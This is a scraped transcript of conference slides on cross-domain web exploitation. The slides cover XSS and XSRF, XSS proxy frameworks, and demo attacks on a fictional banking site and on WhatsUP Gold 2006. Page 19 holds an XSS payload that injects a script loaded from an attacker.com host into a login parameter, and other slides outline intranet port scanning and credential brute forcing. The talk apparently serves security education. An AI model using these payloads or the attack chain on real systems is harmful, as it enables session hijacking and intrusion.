Top Banner
Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube
31

Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

Oct 11, 2020

Download

Documents

dariahiddleston
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Page 1: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

Kicking Down the Cross Domain DoorTechniques for Cross Domain Exploitation

Billy K Rios (BK) and Raghav Dube

Page 2: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

Implication of Cross Domain Attacks

Rich Content

Cookies

Mash-ups

Tabbed Browsing

Ajax

JSON

Page 3: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

Implication of Cross Domain Attacks

Page 4: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

Attack Foundations

Cross Site Scripting (XSS)• Injected Client Code

• Cookie Stealing

• Browser Hijacking

• Web Page Defacement

• Hawtness

Page 5: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

Attack Foundations

XSS Example / Demo

Page 6: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

Attack Foundations

Cross Site Request Forgery (XSRF)• Applications Trust

• Parameters, Cookie, IP Space…

• Authenticated Examples

• New Hawtness

Page 7: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

Attack Foundations

XSRF Example / Demo

Page 8: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

Attack Foundations

XSS meets XSRF• Using XSS and XSRF together!

• XSSXSSRFSSX?

• Both Have Strengths

• Both Have Weaknesses

• One Armed Boxers

Page 9: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

XSS Proxies and Frameworks

XSS Proxy Fundamentals• Anton Rager – XSS Proxy

• BeEf, XSS Shell, Backframe

• <script>alert(‘xss’)</script>

• <script src = …/proxy.js>

• Dynamic JavaScript Payloads

• Frames and Control Channels

Page 10: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

XSS Proxies and Frameworks

XS-Sniper• Typical XSS Proxy

• Rendering of HTML

• Organization of Data

• JavaScript Payloads Provided

• Source Code Snippets

Page 11: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

XSS Proxies and Frameworks

Dynamic JavaScript Payload for execute.js

Captured incoming HTTP requests to the

XS-Sniper Proxy

Page 12: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

Dynamic JavaScript Payload for external.js

Page 13: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

XSS Proxies and Frameworks

Page 14: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

The Attack – The Initial XSS

MyPercent20.com• Popular Social Networking/Blogging Site

• User Base of Tens of Thousands of Users

• Allows Uploading of HTML and Other Content

Page 15: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

The Attack – BigCreditUnion.com

BigCreditUnion.com• Typical Online Banking Website

• Fictional Credit Union

• Built-in Vulnerabilities for Demo

Page 16: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

The Attack – BigCreditUnion.com

The Internet

BigCreditUnion

MyPercent20

Victim Attacker

Page 17: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

The Attack – BigCreditUnion.com

Assumptions• The victim has access to the Internet

• BigCreditUnion.com has an XSS exposure

• The victim is using IE or Firefox

Page 18: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

The Attack – BigCreditUnion.com

Steps to Exploitation• Target Reconnaissance

• Initial XSS

• Jumping to BigCreditUnion

• Authenticated Attacks

• Unauthenticated Attacks

Page 19: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

parent.myFrame3.location.href='http://www.bigcreditunion.com/login.asp?acctnum="></td><script%20src=http://www.attacker.com/test/external-spot.js?></script><td>';

http://www.attacker.com/test/external-spot.js?test123http://www.attacker.com/test/noresponse.js?test123

Page 20: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

The Attack – BigCreditUnion.com

DEMO

Page 21: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

The Attack – WhatsUP Gold 2006

WhatsUP Gold 2006• Made by Ipswitch

• Has Known XSS Vulnerabilities

• Found on Corporate Intranets

• Not Limited to WhatsUP Gold

• “Protected by Firewalls!”

Page 22: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

The Attack – WhatsUP Gold 2006

Page 23: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

The Attack – WhatsUP Gold 2006

Page 24: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

The Attack – WhatsUP Gold 2006

The Internet

MyPercent20

Victim

Attacker

WhatsUPGold

Page 25: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

The Attack – WhatsUP Gold 2006

Assumptions• The management console is only available via the Intranet

• The victim will NOT be logged into the management console

• The victim does NOT have a WhatsUP account

• The victim is using Firefox (Possible with IE)

• No unauthenticated XSS vulnerabilities

Page 26: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

The Attack – WhatsUP Gold 2006

Steps to Exploitation• Vulnerability Research

• Target Reconnaissance

• Initial XSS

• Port scanning and Fingerprinting

• Brute Forcing Credentials

• XSS follow-up

• Driving Interaction

Page 27: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

The Attack – WhatsUP Gold 2006

Creds List

Page 28: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

The Attack – WhatsUP Gold 2006

NOT LIMITED TO WhatsUP Gold!

Page 29: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

The Attack – WhatsUP Gold 2006

DEMO

Page 30: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

WTF?

One More Time… This time in Slow motion

Page 31: Kicking Down the Cross Domain Door€¦ · Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube. Implication of Cross Domain

Questions and Thanks…

PEOPLE I’ve MET

Danya

Nitesh Dhanjani

Rajat Swarup

Sriram

Mike Crabtree

Old PAC-CERT Crew

Ed Souza

PEOPLE I haven’t MET

Jeremiah Grossman

RSnake

Anton Rager

SPIDynamics

Black Hat

Houston & New York Advanced Security Centers!